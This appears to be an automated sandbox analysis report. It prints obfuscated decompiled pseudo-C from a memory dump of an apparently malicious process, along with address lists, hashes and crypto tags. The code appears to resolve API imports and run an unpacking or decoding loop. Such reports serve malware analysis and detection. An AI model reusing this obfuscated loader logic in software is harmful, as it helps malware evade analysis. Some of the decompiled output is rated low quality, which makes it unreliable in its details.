						_t218 =  *(_t283 - 0x10);
						 *_t288 =  *_t288 ^ _t283;
						 *_t288 =  *_t288 + (_t179 & 0x00000000 | _t222 & 0x00000000 |  *(_t283 - 8));
						_t182 =  *((intOrPtr*)(_t190 + 0x45d008))(_t283, _t244);
						_push( *(_t283 - 0x10));
						 *_t288 = _t263;
						_t265 = _t263 & 0x00000000 ^ (_t244 & 0x00000000 |  *(_t283 - 0xc));
						_t244 = _t244;
						 *(_t283 - 0x10) = _t197;
						 *_t265 =  *_t265 & 0x00000000;
						 *_t265 =  *_t265 | _t197 & 0x00000000 ^ _t182;
						_t197 =  *(_t283 - 0x10);
						_pop(_t266);
						 *_t288 = 4;
						_t171 = _t244;
						_t263 = _t266 + _t171;
						 *(_t283 - 0xc) =  *(_t283 - 0xc) + _t171;
					} while ( *_t263 != 0);
					_t244 = _t244 + 0x14;
					_t283 = _t283;
				} while ( *_t244 != 0 ||  *(_t244 + 0x10) != 0);
				_push(_t263);
				return _t171 ^ _t171;
			}

0x002a237b
0x002a237b
0x002a2380
0x002a2383
0x002a2389
0x002a2391
0x002a2398
0x002a239e
0x002a23a1
0x002a23ae
0x002a23b0
0x002a23b6
0x002a23bd
0x002a23c3
0x002a23c3
0x002a23c6
0x002a23d0
0x002a23d2
0x002a23d8
0x002a23e0
0x002a23e7
0x002a23ed
0x002a23ed
0x002a23f0
0x002a23f3
0x002a2498
0x002a249f
0x002a24a1
0x002a24a9
0x002a24b3
0x002a24bf
0x002a24bf
0x002a24c9
0x002a24c9
0x002a24cc
0x002a24d2
0x002a24da
0x002a24e1
0x002a24e7
0x002a24e7
0x002a23f9
0x002a2400
0x002a2402
0x002a2408
0x002a240f
0x002a2415
0x002a2415
0x002a2418
0x002a2424
0x002a2426
0x002a2430
0x002a2434
0x002a243a
0x002a243e
0x002a2440
0x002a2444
0x002a2449
0x002a244f
0x002a2453
0x002a2455
0x002a245b
0x002a245b
0x002a245e
0x002a246a
0x002a2471
0x002a2477
0x002a2477
0x002a2478
0x002a24ea
0x002a24ee
0x002a24ee
0x002a24f8
0x002a24fa
0x002a2502
0x002a2509
0x002a250f
0x002a250f
0x002a2510
0x002a251a
0x002a251c
0x002a2524
0x002a252b
0x002a2531
0x002a2531
0x002a253c
0x002a253e
0x002a2546
0x002a2549
0x002a254d
0x002a2550
0x002a2556
0x002a255d
0x002a2563
0x002a2566
0x002a2566
0x002a2567
0x002a2571
0x002a257a
0x002a2584
0x002a2584
0x002a258f
0x002a2593
0x002a259b
0x002a259b
0x002a259f
0x002a25ab
0x002a25b2
0x002a25b8
0x002a25b8
0x002a25bc
0x002a25c2
0x002a25ca
0x002a25cd
0x002a25d0
0x002a25da
0x002a25da
0x002a25e5
0x002a25e9
0x002a25f1
0x002a25f1
0x002a25f4
0x002a25fa
0x002a2602
0x002a2609
0x002a2612
0x002a2612
0x002a2613
0x002a261d
0x002a2620
0x002a2624
0x002a2627
0x002a2633
0x002a263a
0x002a2640
0x002a2641
0x002a2641
0x002a2642
0x002a264c
0x002a264f
0x002a2652
0x002a265c
0x002a2666
0x002a2666
0x002a2669
0x002a2670
0x002a2674
0x002a2678
0x002a267b
0x002a2681
0x002a2689
0x002a2690
0x002a2696
0x002a2699
0x002a2699
0x002a269d
0x002a26a0
0x002a26ac
0x002a26b0
0x002a26b3
0x002a26b4
0x002a26ba
0x002a26f3
0x002a26f7
0x002a26f8
0x002a26fb
0x002a26bc
0x002a26bc
0x002a26c3
0x002a26c6
0x002a26d9
0x002a26da
0x002a26e2
0x002a26e6
0x002a26e9
0x002a26ec
0x002a26ec
0x002a2705
0x002a270b
0x002a2711
0x002a2715
0x002a2716
0x002a2724
0x002a2728
0x002a272b
0x002a272e
0x002a2734
0x002a2737
0x002a2744
0x002a2746
0x002a2747
0x002a274f
0x002a2752
0x002a2754
0x002a2757
0x002a2759
0x002a2760
0x002a2761
0x002a2763
0x002a2766
0x002a2778
0x002a277a
0x002a277b
0x002a278e
0x002a2799

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b31f65464b9c3f6b06c75afa3e7fbc5f6fe680add954093747edb4d6d8118e
Instruction ID: fdbf25cc7211ed4a7c76d8c0eac8d349f196abfbca60f10a9f49cd5b36b4c4a4
Opcode Fuzzy Hash: d3b31f65464b9c3f6b06c75afa3e7fbc5f6fe680add954093747edb4d6d8118e
Instruction Fuzzy Hash: 5FC17932800215DFEB14CF64C9897AEBBF5FF88725F19846DDC889B145DB781864CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 002A1000, Relevance: .3, Instructions: 279
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E002A1000(void* __eax, signed int __ebx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v20;
				signed int _v32;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* __ecx;
				signed int _t146;
				signed int _t148;
				intOrPtr _t149;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				intOrPtr _t160;
				signed int _t161;
				signed int _t163;
				signed int _t166;
				signed int _t167;
				signed int _t170;
				signed int _t173;
				signed int _t176;
				signed int _t178;
				void* _t179;
				signed int _t182;
				signed int _t186;
				signed int _t196;
				void* _t198;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				signed int _t211;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int* _t251;

				_t230 = __esi;
				_t214 = __edi;
				_t205 = __edx;
				_t167 = __ebx;
				if( *(__ebx + 0x4184df) == 0) {
					_push(__esi);
					_t237 =  *_t251;
					 *_t251 =  *(__ebx + 0x41811f);
					_push(_t239);
					_v20 =  *((intOrPtr*)(__ebx + 0x41860f));
					_t202 = _t176;
					_push(_t237);
					 *_t251 =  *_t251 ^ _t237;
					 *_t251 = _t202;
					_push(_t237);
					_t230 =  *_t251;
					 *_t251 =  *(__ebx + 0x41822f);
					_push(_t230);
					_v32 =  *((intOrPtr*)(__ebx + 0x418523));
					_t166 =  *((intOrPtr*)(__ebx + 0x45d048))();
					_v12 = _t202;
					 *(__ebx + 0x4184df) = 0 ^ _t166;
					_t176 = _v12;
				}
				_v12 = _v12 & 0x00000000;
				_push(_v12);
				 *_t251 =  *_t251 | _t214;
				if( *(_t167 + 0x4183b0) == 0) {
					_v20 =  *((intOrPtr*)(_t167 + 0x418097));
					_t196 =  *_t251;
					 *_t251 =  *(_t167 + 0x418103);
					_t230 =  *_t251;
					 *_t251 =  *(_t167 + 0x418297);
					_v32 =  *((intOrPtr*)(_t167 + 0x41854a));
					_t198 = _t196;
					_t163 =  *((intOrPtr*)(_t167 + 0x45d044))(_t196, _t230, _v20, _t176);
					 *(_t167 + 0x4183b0) =  *(_t167 + 0x4183b0) & 0x00000000;
					 *(_t167 + 0x4183b0) =  *(_t167 + 0x4183b0) | _t198 -  *_t251 | _t163;
					_t176 = _t198;
				}
				_v12 = _t167;
				_t178 = _t176 & 0x00000000 ^ _t167 - _v12 ^ _a4;
				_t170 = _v12;
				if( *((intOrPtr*)(_t170 + 0x418454)) == 0) {
					_v12 = 0;
					_v20 = _v20 ^ _t178;
					_push( *((intOrPtr*)(_t170 + 0x45d020))(_v12));
					_pop( *_t39);
					_push(_v12);
					_pop( *_t41);
					_pop(_t178);
				}
				_t216 = _t214 & 0x00000000 ^ (_t205 ^ _v20 | _t178);
				_t208 = _t205;
				if( *(_t170 + 0x4183c4) == 0) {
					_t161 =  *((intOrPtr*)(_t170 + 0x45d024))();
					_v20 = _t239;
					 *(_t170 + 0x4183c4) = 0 ^ _t161;
					_t239 = 0;
				}
				_v20 = _v20 ^ _t178;
				_t179 = _t178;
				_t45 = _t170 + 0x41847c; // 0x41847c
				_v20 = _v20 ^ _t230;
				_v20 = _t45;
				_t146 =  *((intOrPtr*)(_t170 + 0x45d018))(_t230);
				 *(_t170 + 0x418527) =  *(_t170 + 0x418527) & 0x00000000;
				 *(_t170 + 0x418527) =  *(_t170 + 0x418527) ^ _t179 -  *_t251 ^ _t146;
				_t182 = _t179;
				 *_t251 = _t170;
				_v8 = _t216;
				_t173 = 0;
				_t52 = _t173 + 0x4182af; // 0x4182af
				_v12 = _v12 & 0x00000000;
				 *_t251 =  *_t251 ^ _t52;
				_t148 =  *((intOrPtr*)(_t173 + 0x45d018))(_v12);
				 *(_t173 + 0x41824b) =  *(_t173 + 0x41824b) & 0x00000000;
				 *(_t173 + 0x41824b) =  *(_t173 + 0x41824b) | _t239 ^  *_t251 ^ _t148;
				_t242 = _t239;
				_push(0);
				if( *((intOrPtr*)(_t173 + 0x418107)) == 0) {
					_t160 =  *((intOrPtr*)(_t173 + 0x45d020))();
					_v32 = _t242;
					 *((intOrPtr*)(_t173 + 0x418107)) = _t160;
					_t242 = 0;
				}
				_t149 =  *((intOrPtr*)(_t173 + 0x45d030))();
				if( *((intOrPtr*)(_t173 + 0x418597)) == 0) {
					_v12 = _v12 & 0x00000000;
					_push(_v12);
					_v32 = _v32 + _t182;
					_push(_t242);
					_t69 = _t173 + 0x418460; // 0x0
					 *_t251 =  *_t69;
					_push(_t182);
					_push( *_t251);
					_t71 = _t173 + 0x418623; // 0x300
					_v40 =  *_t71;
					_pop(_t242);
					_t73 = _t173 + 0x4181bb; // 0x101b2908
					_v44 =  *_t73;
					_v48 = _v48 ^ _t216;
					_v48 = _t230;
					_t149 =  *((intOrPtr*)(_t173 + 0x45d044))(_t182);
					 *_t76 = _t149;
					_push(_v12);
					_pop( *_t78);
					_t182 = _t216;
				}
				do {
					_v8 = _v8 - 1;
					if( *((intOrPtr*)(_t173 + 0x4182fb)) == 0) {
						_v12 = 0;
						_v32 = _v32 | _t182;
						_t84 = _t173 + 0x4184ff; // 0x300
						_t242 =  *_t251;
						 *_t251 =  *_t84;
						_t86 = _t173 + 0x418371; // 0x8000000
						_v40 =  *_t86;
						_t88 = _t173 + 0x41810f; // 0x2030408
						_v44 =  *_t88;
						_t211 = _t208;
						_t90 = _t173 + 0x41825b; // 0x600
						_v48 =  *_t90;
						_t216 = _t216;
						_t149 =  *((intOrPtr*)(_t173 + 0x45d044))(_t230, _t182, _t242, _v12);
						_v12 = _t211;
						 *((intOrPtr*)(_t173 + 0x4182fb)) = _t149;
						_t208 = _v12;
						_t182 = _t149;
					}
					_v12 = _t230;
					_t218 = _t216 & 0x00000000 | _t230 - _v12 ^ _t182;
					_t230 = _v12;
					if( *(_t173 + 0x4182bf) == 0) {
						_v32 = _v32 ^ _t173;
						_v32 = _v32 | _t182;
						 *_t251 = 2;
						_t100 = _t173 + 0x4180c3; // 0x500
						_v40 =  *_t100;
						_t102 = _t173 + 0x418369; // 0x3000000
						_t218 = _v44;
						_v44 =  *_t102;
						_t155 =  *((intOrPtr*)(_t173 + 0x45d03c))(_t149, _t242, _t173);
						_v12 = _t230;
						 *(_t173 + 0x4182bf) = 0 ^ _t155;
						_t230 = _v12;
						_t182 = _t218;
					}
					_v12 = _v12 & 0x00000000;
					_v32 = _v32 + _t182;
					_t112 = _t173 + 0x41855a; // 0x41855a
					_v12 = _v12 & 0x00000000;
					 *_t251 =  *_t251 ^ _t112;
					_t151 =  *((intOrPtr*)(_t173 + 0x45d018))(_v12, _v12);
					 *(_t173 + 0x418408) =  *(_t173 + 0x418408) & 0x00000000;
					 *(_t173 + 0x418408) =  *(_t173 + 0x418408) | _t182 ^ _v40 ^ _t151;
					_t186 = _t182;
					_t220 = _t218 + _a4 + 1;
					if( *(_t173 + 0x418047) == 0) {
						 *_t251 = _t186;
						_t123 = _t173 + 0x4182c3; // 0x300
						_v40 =  *_t123;
						_t125 = _t173 + 0x418424; // 0x4
						_v44 =  *_t125;
						_v12 = 0;
						_v48 = _v48 | _t173;
						_t159 =  *((intOrPtr*)(_t173 + 0x45d040))(_v12, _t186, _t151, _t220, _v12);
						_v12 = _t220;
						 *(_t173 + 0x418047) = 0 ^ _t159;
						_t220 = _v12;
						_pop(_t186);
					}
					 *_t251 =  *_t251 - _t230;
					 *_t251 = _t186;
					_t173 = _t173;
					 *((intOrPtr*)(_t173 + 0x45d038))(_t230);
					_push((_t220 + _a8 | _a4) + 1);
					_t216 = _v40;
					_v40 = _v8;
					_v12 = _v12 & 0x00000000;
					_push(_v12);
					_v44 = _v44 | _t216;
					_v48 = _a8;
					_t208 = _t208;
					_t149 = E002A6424(_t173, _t186, _t216, _t230);
					_t182 = _t230;
				} while (_v8 != 0);
				return 0;
			}

0x002a1000
0x002a1000
0x002a1000
0x002a1000
0x002a100d
0x002a100f
0x002a1016
0x002a1016
0x002a1019
0x002a1021
0x002a1025
0x002a1026
0x002a1027
0x002a102a
0x002a102d
0x002a1034
0x002a1034
0x002a1037
0x002a103f
0x002a1044
0x002a104a
0x002a1051
0x002a1057
0x002a1057
0x002a105a
0x002a105e
0x002a1061
0x002a106b
0x002a1074
0x002a107e
0x002a107e
0x002a1088
0x002a1088
0x002a1093
0x002a1097
0x002a1098
0x002a10a4
0x002a10ab
0x002a10b1
0x002a10b1
0x002a10b2
0x002a10be
0x002a10c0
0x002a10ca
0x002a10cc
0x002a10d6
0x002a10df
0x002a10e0
0x002a10e3
0x002a10e6
0x002a10ec
0x002a10ec
0x002a10f6
0x002a10f8
0x002a1100
0x002a1102
0x002a110a
0x002a1111
0x002a1117
0x002a1117
0x002a1119
0x002a111c
0x002a111d
0x002a1124
0x002a1127
0x002a112a
0x002a1136
0x002a113d
0x002a1143
0x002a1146
0x002a114d
0x002a1150
0x002a1151
0x002a1157
0x002a115e
0x002a1161
0x002a116d
0x002a1174
0x002a117a
0x002a117b
0x002a1184
0x002a1186
0x002a118e
0x002a1195
0x002a119b
0x002a119b
0x002a119c
0x002a11a9
0x002a11ab
0x002a11af
0x002a11b2
0x002a11b5
0x002a11b6
0x002a11bc
0x002a11bf
0x002a11c0
0x002a11c1
0x002a11c7
0x002a11cb
0x002a11cd
0x002a11d3
0x002a11d7
0x002a11da
0x002a11dd
0x002a11e4
0x002a11e7
0x002a11ea
0x002a11f0
0x002a11f0
0x002a11f1
0x002a11f1
0x002a11fb
0x002a11fd
0x002a1207
0x002a120b
0x002a1211
0x002a1211
0x002a1215
0x002a121b
0x002a1220
0x002a1226
0x002a122a
0x002a122d
0x002a1233
0x002a1237
0x002a1238
0x002a123e
0x002a1245
0x002a124b
0x002a124e
0x002a124e
0x002a124f
0x002a125a
0x002a125c
0x002a1266
0x002a1269
0x002a126c
0x002a1270
0x002a1278
0x002a127e
0x002a1282
0x002a1288
0x002a1288
0x002a128b
0x002a1291
0x002a1298
0x002a129e
0x002a12a1
0x002a12a1
0x002a12a5
0x002a12ac
0x002a12af
0x002a12b5
0x002a12bc
0x002a12bf
0x002a12cb
0x002a12d2
0x002a12d9
0x002a12da
0x002a12e2
0x002a12e7
0x002a12ec
0x002a12f2
0x002a12f8
0x002a12fe
0x002a1301
0x002a130b
0x002a130e
0x002a1314
0x002a131b
0x002a1321
0x002a1324
0x002a1324
0x002a1326
0x002a1329
0x002a1337
0x002a1339
0x002a133f
0x002a1343
0x002a1343
0x002a1346
0x002a134a
0x002a134d
0x002a1355
0x002a1359
0x002a135a
0x002a135f
0x002a1360
0x002a1371

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4342e90b92e638b973889a9d05bcbe9378d07ee4f75416b9680d699ffb522fa4
Instruction ID: b9d1d4a05380a4dfc7f9ca7d9af0e42f460951c566d6611d8ee5001e2324268f
Opcode Fuzzy Hash: 4342e90b92e638b973889a9d05bcbe9378d07ee4f75416b9680d699ffb522fa4
Instruction Fuzzy Hash: D8C1AE72808208EFEB149F64C8897AEBBF5FF48715F15409DED889F146DB7015A0CB68

Uniqueness

Uniqueness Score: -1.00%

Function 002A247B, Relevance: .3, Instructions: 254
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002A247B(void* __ecx, signed int __edx, signed int __edi) {
				signed int _t153;
				signed int _t157;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				void* _t166;
				signed int _t168;
				signed int _t169;
				signed int _t172;
				void* _t178;
				signed int _t179;
				signed int _t187;
				signed int _t193;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t206;
				void* _t216;
				signed int _t218;
				signed int _t221;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t239;
				void* _t240;
				void* _t250;
				signed int _t252;
				signed int _t255;
				signed int* _t260;

				_t221 = __edi;
				_t197 = __edx;
				_t172 = 0x418087;
				 *((intOrPtr*)(_t255 + 0x13)) =  *((intOrPtr*)(_t255 + 0x13)) + __edx;
				_t153 =  *0x008750A3();
				 *_t4 = _t153;
				 *0x0083010E =  *(_t255 - 0x10);
				while(1) {
					L7:
					 *_t260 = _t153;
					_t233 = 0 ^  *_t221;
					_t153 = 0;
					if( *(_t172 + 0x41816b) == 0) {
						_t260[1] =  *(_t172 + 0x418487);
						_t197 =  *_t260;
						 *_t260 =  *(_t172 + 0x418338);
						_t187 =  *_t260;
						 *_t260 =  *(_t172 + 0x4183ec);
						_t153 =  *((intOrPtr*)(_t172 + 0x45d03c))(_t179, _t197, _t153, _t233);
						 *(_t255 - 0x10) = _t187;
						 *(_t172 + 0x41816b) =  *(_t172 + 0x41816b) & 0x00000000;
						 *(_t172 + 0x41816b) =  *(_t172 + 0x41816b) | _t187 ^  *(_t255 - 0x10) ^ _t153;
						_t179 =  *(_t255 - 0x10);
					}
					while(1) {
						_push(_t153);
						_t157 =  *_t260;
						 *_t260 =  *(_t221 + 0x10);
						if( *(_t172 + 0x4185cb) == 0) {
							_t157 =  *((intOrPtr*)(_t172 + 0x45d024))();
							 *_t260 = _t221;
							 *(_t172 + 0x4185cb) = 0 ^ _t157;
							_t221 = 0;
						}
						_pop( *_t48);
						if( *(_t172 + 0x418273) == 0) {
							_t157 =  *((intOrPtr*)(_t172 + 0x45d020))();
							 *_t260 = _t179;
							 *(_t172 + 0x418273) = _t157;
							_t179 = 0;
						}
						_t159 = _t157 & 0x00000000 | _t233 & 0x00000000 ^  *(_t255 + 8);
						_t236 = _t233;
						if( *(_t172 + 0x418203) == 0) {
							 *_t260 =  *_t260 & 0x00000000;
							 *_t260 =  *_t260 | _t159;
							_t169 =  *((intOrPtr*)(_t172 + 0x45d020))();
							 *(_t255 - 0x10) = _t221;
							 *(_t172 + 0x418203) = 0 ^ _t169;
							_t221 =  *(_t255 - 0x10);
							_t159 = _t221;
						}
						 *(_t255 - 0xc) =  *(_t255 - 0xc) + _t159;
						if( *(_t172 + 0x4184ef) == 0) {
							 *_t260 =  *(_t172 + 0x418127);
							_t221 =  *_t260;
							 *_t260 =  *(_t172 + 0x4182f7);
							_t260[1] =  *(_t172 + 0x4185f7);
							_t250 = _t236;
							_t252 =  *_t260;
							 *_t260 =  *(_t172 + 0x41827f);
							_t159 =  *((intOrPtr*)(_t172 + 0x45d048))(_t260, _t250, _t236, _t221, _t179);
							 *(_t172 + 0x4184ef) =  *(_t172 + 0x4184ef) & 0x00000000;
							 *(_t172 + 0x4184ef) =  *(_t172 + 0x4184ef) | _t252 ^  *_t260 | _t159;
							_t236 = _t252;
						}
						 *_t75 =  *((intOrPtr*)(_t221 + 0xc));
						_t178 =  *(_t255 - 0x10);
						if( *(_t172 + 0x418334) == 0) {
							 *_t260 =  *_t260 ^ _t172;
							 *_t260 =  *_t260 + _t178;
							_t193 =  *_t260;
							 *_t260 =  *(_t172 + 0x41838d);
							_t260[1] =  *(_t172 + 0x4185af);
							_t221 = _t221;
							_t255 =  *_t260;
							 *_t260 =  *(_t172 + 0x418410);
							_t159 =  *((intOrPtr*)(_t172 + 0x45d03c))(_t159, _t178, _t172);
							 *(_t255 - 0x10) = _t193;
							 *(_t172 + 0x418334) =  *(_t172 + 0x418334) & 0x00000000;
							 *(_t172 + 0x418334) =  *(_t172 + 0x418334) ^ (_t193 & 0x00000000 | _t159);
							_t178 = _t255;
						}
						_t179 = _t178 +  *(_t255 + 8);
						if( *(_t172 + 0x418474) == 0) {
							 *_t260 =  *_t260 & 0x00000000;
							 *_t260 =  *_t260 + _t179;
							_t159 =  *((intOrPtr*)(_t172 + 0x45d020))();
							 *(_t172 + 0x418474) =  *(_t172 + 0x418474) & 0x00000000;
							 *(_t172 + 0x418474) =  *(_t172 + 0x418474) | _t197 -  *_t260 ^ _t159;
							_t197 = _t197;
							_t179 = _t197;
						}
						_t237 = _t236 +  *(_t255 + 8);
						if( *(_t172 + 0x418020) == 0) {
							 *_t260 =  *_t260 - _t159;
							 *_t260 = _t179;
							 *_t260 =  *(_t172 + 0x418493);
							_t197 =  *_t260;
							 *_t260 =  *(_t172 + 0x418507);
							 *(_t255 - 0x10) =  *(_t255 - 0x10) & 0x00000000;
							 *_t260 =  *_t260 + _t172;
							 *_t260 =  *_t260 & 0x00000000;
							 *_t260 =  *_t260 ^ _t172;
							_t168 =  *((intOrPtr*)(_t172 + 0x45d044))( *(_t255 - 0x10),  *_t260, _t197, _t159);
							 *(_t255 - 0x10) = _t221;
							 *(_t172 + 0x418020) =  *(_t172 + 0x418020) & 0x00000000;
							 *(_t172 + 0x418020) =  *(_t172 + 0x418020) | _t221 ^  *(_t255 - 0x10) | _t168;
							_t221 =  *(_t255 - 0x10);
							_t179 = _t197;
						}
						 *_t260 = _t179;
						_t160 =  *((intOrPtr*)(_t172 + 0x45d00c))( *(_t255 - 0x10));
						 *(_t255 - 8) =  *(_t255 - 8) & 0x00000000;
						 *(_t255 - 8) =  *(_t255 - 8) ^ (_t172 -  *_t260 | _t160);
						_t172 = _t172;
						do {
							L24:
							if(( *_t237 & 0x80000000) != 0) {
								_t260[1] =  *_t237;
								_t199 = _t197;
								 *_t134 = _t221;
								 *(_t255 - 4) =  *(_t255 - 4) & 0x0000ffff;
							} else {
								 *(_t255 - 0x10) = 0;
								_push( *(_t255 - 0x10));
								 *_t260 =  *_t260 + _t237;
								_t206 = _t197;
								 *(_t255 - 0x10) = _t206;
								 *(_t255 - 4) =  *(_t255 - 4) & 0x00000000;
								 *(_t255 - 4) =  *(_t255 - 4) ^ _t206 ^  *(_t255 - 0x10) ^  *_t237 +  *(_t255 + 8) + 0x00000002;
								_t199 =  *(_t255 - 0x10);
								_pop(_t237);
							}
							 *_t138 =  *(_t255 - 4);
							_t161 =  *(_t255 - 0x10);
							_t260[1] =  *(_t255 - 4);
							_t201 = _t199;
							 *(_t255 - 0x10) = _t201;
							_t197 =  *(_t255 - 0x10);
							 *_t260 =  *_t260 ^ _t255;
							 *_t260 =  *_t260 + (_t161 & 0x00000000 | _t201 & 0x00000000 |  *(_t255 - 8));
							_t164 =  *((intOrPtr*)(_t172 + 0x45d008))(_t255, _t221);
							_push( *(_t255 - 0x10));
							 *_t260 = _t237;
							_t239 = _t237 & 0x00000000 ^ (_t221 & 0x00000000 |  *(_t255 - 0xc));
							_t221 = _t221;
							 *(_t255 - 0x10) = _t179;
							 *_t239 =  *_t239 & 0x00000000;
							 *_t239 =  *_t239 | _t179 & 0x00000000 ^ _t164;
							_t179 =  *(_t255 - 0x10);
							_pop(_t240);
							 *_t260 = 4;
							_t153 = _t221;
							_t237 = _t240 + _t153;
							 *(_t255 - 0xc) =  *(_t255 - 0xc) + _t153;
						} while ( *_t237 != 0);
						_t221 = _t221 + 0x14;
						_t255 = _t255;
						if( *_t221 != 0 ||  *(_t221 + 0x10) != 0) {
							if( *_t221 != 0) {
								goto L7;
							}
							if( *(_t172 + 0x418420) == 0) {
								_t153 =  *((intOrPtr*)(_t172 + 0x45d024))();
								 *(_t255 - 0x10) = _t179;
								 *(_t172 + 0x418420) = 0 ^ _t153;
								_t179 =  *(_t255 - 0x10);
							}
							 *(_t255 - 0x10) = _t172;
							_t233 = _t237 & 0x00000000 ^ _t172 -  *(_t255 - 0x10) ^  *(_t221 + 0x10);
							_t172 =  *(_t255 - 0x10);
							if( *(_t172 + 0x41812f) == 0) {
								_t17 = _t172 + 0x418033; // 0x700
								_t260[1] =  *_t17;
								_t166 = _t153;
								 *_t260 =  *_t260 & 0x00000000;
								 *_t260 =  *_t260 + _t166;
								_t19 = _t172 + 0x41813b; // 0x300
								_t260[1] =  *_t19;
								_t216 = _t197;
								_t21 = _t172 + 0x4182eb; // 0x500
								_t218 =  *_t260;
								 *_t260 =  *_t21;
								_t153 =  *((intOrPtr*)(_t172 + 0x45d044))(_t216, _t233, _t172, _t153);
								 *(_t172 + 0x41812f) =  *(_t172 + 0x41812f) & 0x00000000;
								 *(_t172 + 0x41812f) =  *(_t172 + 0x41812f) ^ _t218 ^  *_t260 ^ _t153;
								_t197 = _t218;
							}
							_push(_t153);
							_t157 =  *_t260;
							 *_t260 =  *(_t221 + 0x10);
							if( *(_t172 + 0x4185cb) == 0) {
								_t157 =  *((intOrPtr*)(_t172 + 0x45d024))();
								 *_t260 = _t221;
								 *(_t172 + 0x4185cb) = 0 ^ _t157;
								_t221 = 0;
							}
							_pop( *_t48);
							if( *(_t172 + 0x418273) == 0) {
								_t157 =  *((intOrPtr*)(_t172 + 0x45d020))();
								 *_t260 = _t179;
								 *(_t172 + 0x418273) = _t157;
								_t179 = 0;
							}
							_t159 = _t157 & 0x00000000 | _t233 & 0x00000000 ^  *(_t255 + 8);
							_t236 = _t233;
							if( *(_t172 + 0x418203) == 0) {
								 *_t260 =  *_t260 & 0x00000000;
								 *_t260 =  *_t260 | _t159;
								_t169 =  *((intOrPtr*)(_t172 + 0x45d020))();
								 *(_t255 - 0x10) = _t221;
								 *(_t172 + 0x418203) = 0 ^ _t169;
								_t221 =  *(_t255 - 0x10);
								_t159 = _t221;
							}
							 *(_t255 - 0xc) =  *(_t255 - 0xc) + _t159;
							if( *(_t172 + 0x4184ef) == 0) {
								 *_t260 =  *(_t172 + 0x418127);
								_t221 =  *_t260;
								 *_t260 =  *(_t172 + 0x4182f7);
								_t260[1] =  *(_t172 + 0x4185f7);
								_t250 = _t236;
								_t252 =  *_t260;
								 *_t260 =  *(_t172 + 0x41827f);
								_t159 =  *((intOrPtr*)(_t172 + 0x45d048))(_t260, _t250, _t236, _t221, _t179);
								 *(_t172 + 0x4184ef) =  *(_t172 + 0x4184ef) & 0x00000000;
								 *(_t172 + 0x4184ef) =  *(_t172 + 0x4184ef) | _t252 ^  *_t260 | _t159;
								_t236 = _t252;
							}
							 *_t75 =  *((intOrPtr*)(_t221 + 0xc));
							_t178 =  *(_t255 - 0x10);
							if( *(_t172 + 0x418334) == 0) {
								 *_t260 =  *_t260 ^ _t172;
								 *_t260 =  *_t260 + _t178;
								_t193 =  *_t260;
								 *_t260 =  *(_t172 + 0x41838d);
								_t260[1] =  *(_t172 + 0x4185af);
								_t221 = _t221;
								_t255 =  *_t260;
								 *_t260 =  *(_t172 + 0x418410);
								_t159 =  *((intOrPtr*)(_t172 + 0x45d03c))(_t159, _t178, _t172);
								 *(_t255 - 0x10) = _t193;
								 *(_t172 + 0x418334) =  *(_t172 + 0x418334) & 0x00000000;
								 *(_t172 + 0x418334) =  *(_t172 + 0x418334) ^ (_t193 & 0x00000000 | _t159);
								_t178 = _t255;
							}
							_t179 = _t178 +  *(_t255 + 8);
							if( *(_t172 + 0x418474) == 0) {
								 *_t260 =  *_t260 & 0x00000000;
								 *_t260 =  *_t260 + _t179;
								_t159 =  *((intOrPtr*)(_t172 + 0x45d020))();
								 *(_t172 + 0x418474) =  *(_t172 + 0x418474) & 0x00000000;
								 *(_t172 + 0x418474) =  *(_t172 + 0x418474) | _t197 -  *_t260 ^ _t159;
								_t197 = _t197;
								_t179 = _t197;
							}
							_t237 = _t236 +  *(_t255 + 8);
							if( *(_t172 + 0x418020) == 0) {
								 *_t260 =  *_t260 - _t159;
								 *_t260 = _t179;
								 *_t260 =  *(_t172 + 0x418493);
								_t197 =  *_t260;
								 *_t260 =  *(_t172 + 0x418507);
								 *(_t255 - 0x10) =  *(_t255 - 0x10) & 0x00000000;
								 *_t260 =  *_t260 + _t172;
								 *_t260 =  *_t260 & 0x00000000;
								 *_t260 =  *_t260 ^ _t172;
								_t168 =  *((intOrPtr*)(_t172 + 0x45d044))( *(_t255 - 0x10),  *_t260, _t197, _t159);
								 *(_t255 - 0x10) = _t221;
								 *(_t172 + 0x418020) =  *(_t172 + 0x418020) & 0x00000000;
								 *(_t172 + 0x418020) =  *(_t172 + 0x418020) | _t221 ^  *(_t255 - 0x10) | _t168;
								_t221 =  *(_t255 - 0x10);
								_t179 = _t197;
							}
							 *_t260 = _t179;
							_t160 =  *((intOrPtr*)(_t172 + 0x45d00c))( *(_t255 - 0x10));
							 *(_t255 - 8) =  *(_t255 - 8) & 0x00000000;
							 *(_t255 - 8) =  *(_t255 - 8) ^ (_t172 -  *_t260 | _t160);
							_t172 = _t172;
							goto L24;
						} else {
							_push(_t237);
							return _t153 ^ _t153;
						}
					}
				}
			}

0x002a247b
0x002a247b
0x002a247b
0x002a2480
0x002a2483
0x002a248a
0x002a2490
0x002a2496
0x002a2496
0x002a2498
0x002a249f
0x002a24a1
0x002a24a9
0x002a24b3
0x002a24bf
0x002a24bf
0x002a24c9
0x002a24c9
0x002a24cc
0x002a24d2
0x002a24da
0x002a24e1
